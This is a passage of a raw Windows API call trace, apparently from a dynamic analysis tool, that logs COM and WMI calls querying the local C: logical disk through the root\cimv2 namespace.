returned 0x0 [0139.524] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f4ec | out: ppvObject=0x689f4ec*=0x0) returned 0x80004002 [0139.524] IUnknown:Release (This=0x72015c) returned 0x1 [0139.526] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee58 | out: ppv=0x689ee58*=0x6736f18) returned 0x0 [0139.526] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f070 | out: ppvObject=0x689f070*=0x0) returned 0x80004002 [0139.526] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f084 | out: ppvObject=0x689f084*=0x6738540) returned 0x0 [0139.526] WbemDefPath:IUnknown:Release (This=0x6736f18) returned 0x0 [0139.526] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eca4 | out: ppvObject=0x689eca4*=0x6738540) returned 0x0 [0139.526] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec60 | out: ppvObject=0x689ec60*=0x0) returned 0x80004002 [0139.526] WbemDefPath:IUnknown:AddRef (This=0x6738540) returned 0x3 [0139.526] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e5bc | out: ppvObject=0x689e5bc*=0x0) returned 0x80004002 [0139.526] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0139.526] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e578 | out: ppvObject=0x689e578*=0x7ae460) returned 0x0 [0139.527] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e580 | out: pCid=0x689e580*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0139.527] WbemDefPath:IUnknown:Release (This=0x7ae460) returned 0x3 [0139.527] CoGetContextToken (in: pToken=0x689e5d8 | out: pToken=0x689e5d8) returned 0x0 [0139.527] CoGetContextToken (in: pToken=0x689e9e0 | out: pToken=0x689e9e0) returned 0x0 [0139.527] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea70 | out: ppvObject=0x689ea70*=0x0) returned 0x80004002 [0139.527] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x2 [0139.527] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x1 [0139.527] CoGetContextToken (in: pToken=0x689f368 | out: pToken=0x689f368) returned 0x0 [0139.527] CoGetContextToken (in: pToken=0x689f2c8 | out: pToken=0x689f2c8) returned 0x0 [0139.527] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738540, riid=0x689f398*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f394 | out: ppvObject=0x689f394*=0x6738540) returned 0x0 [0139.527] WbemDefPath:IUnknown:AddRef (This=0x6738540) returned 0x3 [0139.527] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x2 [0139.527] WbemDefPath:IWbemPath:SetText (This=0x6738540, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0139.527] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738540, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0139.527] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=2, puBuffLength=0x689f518*=0x0, pszText=0x0 | out: puBuffLength=0x689f518*=0x20, pszText=0x0) returned 0x0 [0139.527] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=2, puBuffLength=0x689f518*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f518*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0139.527] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738540, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0139.527] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738540, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0139.527] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738540, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0139.528] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738540, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0139.528] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738540, puCount=0x689f49c | out: puCount=0x689f49c*=0x0) returned 0x0 [0139.528] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f488 | out: puCount=0x689f488*=0x2) returned 0x0 [0139.528] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0x0, pszText=0x0 | out: puBuffLength=0x689f484*=0xf, pszText=0x0) returned 0x0 [0139.528] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f484*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0139.528] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f438 | out: ppv=0x689f438*=0x72015c) returned 0x0 [0139.528] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f430 | out: pAptType=0x689f430*=1) returned 0x0 [0139.528] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f434 | out: ppvObject=0x689f434*=0x0) returned 0x80004002 [0139.528] IUnknown:Release (This=0x72015c) returned 0x1 [0139.529] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689eda0 | out: ppv=0x689eda0*=0x6736ed8) returned 0x0 [0139.529] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689efb8 | out: ppvObject=0x689efb8*=0x0) returned 0x80004002 [0139.529] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ed8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efcc | out: ppvObject=0x689efcc*=0x67384d0) returned 0x0 [0139.529] WbemDefPath:IUnknown:Release (This=0x6736ed8) returned 0x0 [0139.529] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebec | out: ppvObject=0x689ebec*=0x67384d0) returned 0x0 [0139.529] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eba8 | out: ppvObject=0x689eba8*=0x0) returned 0x80004002 [0139.530] WbemDefPath:IUnknown:AddRef (This=0x67384d0) returned 0x3 [0139.530] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e504 | out: ppvObject=0x689e504*=0x0) returned 0x80004002 [0139.530] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0139.530] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e4c0 | out: ppvObject=0x689e4c0*=0x7ae480) returned 0x0 [0139.530] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae480, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e4c8 | out: pCid=0x689e4c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0139.530] WbemDefPath:IUnknown:Release (This=0x7ae480) returned 0x3 [0139.530] CoGetContextToken (in: pToken=0x689e520 | out: pToken=0x689e520) returned 0x0 [0139.530] CoGetContextToken (in: pToken=0x689e928 | out: pToken=0x689e928) returned 0x0 [0139.530] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e9b8 | out: ppvObject=0x689e9b8*=0x0) returned 0x80004002 [0139.530] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x2 [0139.530] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x1 [0139.530] CoGetContextToken (in: pToken=0x689f2b0 | out: pToken=0x689f2b0) returned 0x0 [0139.530] CoGetContextToken (in: pToken=0x689f210 | out: pToken=0x689f210) returned 0x0 [0139.530] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x689f2e0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f2dc | out: ppvObject=0x689f2dc*=0x67384d0) returned 0x0 [0139.530] WbemDefPath:IUnknown:AddRef (This=0x67384d0) returned 0x3 [0139.530] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x2 [0139.530] WbemDefPath:IWbemPath:SetText (This=0x67384d0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0139.530] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67384d0, puCount=0x689f460 | out: puCount=0x689f460*=0x2) returned 0x0 [0139.530] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=4, puBuffLength=0x689f45c*=0x0, pszText=0x0 | out: puBuffLength=0x689f45c*=0xf, pszText=0x0) returned 0x0 [0139.530] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=4, puBuffLength=0x689f45c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f45c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0139.531] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f460 | out: ppv=0x689f460*=0x72015c) returned 0x0 [0139.531] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f458 | out: pAptType=0x689f458*=1) returned 0x0 [0139.531] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f45c | out: ppvObject=0x689f45c*=0x0) returned 0x80004002 [0139.531] IUnknown:Release (This=0x72015c) returned 0x1 [0139.532] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f080 | out: ppv=0x689f080*=0x673ed08) returned 0x0 [0139.532] WbemLocator:IUnknown:QueryInterface (in: This=0x673ed08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f298 | out: ppvObject=0x689f298*=0x0) returned 0x80004002 [0139.532] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ed08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f2ac | out: ppvObject=0x689f2ac*=0x6736ec8) returned 0x0 [0139.532] WbemLocator:IUnknown:Release (This=0x673ed08) returned 0x0 [0139.532] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eecc | out: ppvObject=0x689eecc*=0x6736ec8) returned 0x0 [0139.532] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee88 | out: ppvObject=0x689ee88*=0x0) returned 0x80004002 [0139.532] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0139.532] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e7e4 | out: ppvObject=0x689e7e4*=0x0) returned 0x80004002 [0139.532] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0139.532] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e7a0 | out: ppvObject=0x689e7a0*=0x0) returned 0x80004002 [0139.532] CoGetContextToken (in: pToken=0x689e800 | out: pToken=0x689e800) returned 0x0 [0139.532] CoGetContextToken (in: pToken=0x689ec08 | out: pToken=0x689ec08) returned 0x0 [0139.532] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec98 | out: ppvObject=0x689ec98*=0x0) returned 0x80004002 [0139.532] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0139.533] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0139.533] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0139.533] CoGetContextToken (in: pToken=0x689f1d8 | out: pToken=0x689f1d8) returned 0x0 [0139.533] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x689f2a8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f2a4 | out: ppvObject=0x689f2a4*=0x6736ec8) returned 0x0 [0139.533] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0139.533] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0139.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67384d0, puCount=0x689f43c | out: puCount=0x689f43c*=0x2) returned 0x0 [0139.533] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=8, puBuffLength=0x689f438*=0x0, pszText=0x0 | out: puBuffLength=0x689f438*=0xf, pszText=0x0) returned 0x0 [0139.533] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=8, puBuffLength=0x689f438*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f438*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0139.533] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f314 | out: ppv=0x689f314*=0x6736eb8) returned 0x0 [0139.533] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736eb8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f3a8 | out: ppNamespace=0x689f3a8*=0x672099c) returned 0x0 [0142.220] WbemLocator:IUnknown:QueryInterface (in: This=0x672099c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f244 | out: ppvObject=0x689f244*=0x780af4) returned 0x0 [0142.220] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780af4, pProxy=0x672099c, pAuthnSvc=0x689f294, pAuthzSvc=0x689f290, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c, pImpLevel=0x689f27c, pAuthInfo=0x689f280, pCapabilites=0x689f284 | out: pAuthnSvc=0x689f294*=0xa, pAuthzSvc=0x689f290*=0x0, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c*=0x6, pImpLevel=0x689f27c*=0x2, pAuthInfo=0x689f280, pCapabilites=0x689f284*=0x1) returned 0x0 [0142.221] WbemLocator:IUnknown:Release (This=0x780af4) returned 0x1 [0142.221] WbemLocator:IUnknown:QueryInterface (in: This=0x672099c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f238 | out: ppvObject=0x689f238*=0x780b14) returned 0x0 [0142.221] WbemLocator:IUnknown:QueryInterface (in: This=0x672099c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f234 | out: ppvObject=0x689f234*=0x780af4) returned 0x0 [0142.221] WbemLocator:IClientSecurity:SetBlanket (This=0x780af4, pProxy=0x672099c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0142.221] WbemLocator:IUnknown:Release (This=0x780af4) returned 0x2 [0142.222] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x1 [0142.222] CoTaskMemFree (pv=0x77df98) [0142.222] WbemLocator:IUnknown:Release (This=0x6736eb8) returned 0x0 [0142.533] WbemLocator:IUnknown:QueryInterface (in: This=0x672099c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee34 | out: ppvObject=0x689ee34*=0x780b14) returned 0x0 [0142.533] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689edf0 | out: ppvObject=0x689edf0*=0x0) returned 0x80004002 [0144.021] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ec0c | out: ppvObject=0x689ec0c*=0x0) returned 0x80004002 [0144.164] WbemLocator:IUnknown:AddRef (This=0x780b14) returned 0x3 [0144.164] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e74c | out: ppvObject=0x689e74c*=0x0) returned 0x80004002 [0144.295] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0144.296] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e708 | out: ppvObject=0x689e708*=0x780a74) returned 0x0 [0144.296] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780a74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e710 | out: pCid=0x689e710*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0144.296] WbemLocator:IUnknown:Release (This=0x780a74) returned 0x3 [0144.296] CoGetContextToken (in: pToken=0x689e768 | out: pToken=0x689e768) returned 0x0 [0144.297] CoGetContextToken (in: pToken=0x689eb70 | out: pToken=0x689eb70) returned 0x0 [0144.297] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec00 | out: ppvObject=0x689ec00*=0x780afc) returned 0x0 [0144.297] WbemLocator:IRpcOptions:Query (in: This=0x780afc, pPrx=0x780b14, dwProperty=2, pdwValue=0x689ec28 | out: pdwValue=0x689ec28) returned 0x80004002 [0144.297] WbemLocator:IUnknown:Release (This=0x780afc) returned 0x3 [0144.297] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x2 [0144.297] CoGetContextToken (in: pToken=0x689f148 | out: pToken=0x689f148) returned 0x0 [0144.297] CoGetContextToken (in: pToken=0x689f0a8 | out: pToken=0x689f0a8) returned 0x0 [0144.297] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x689f178*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f174 | out: 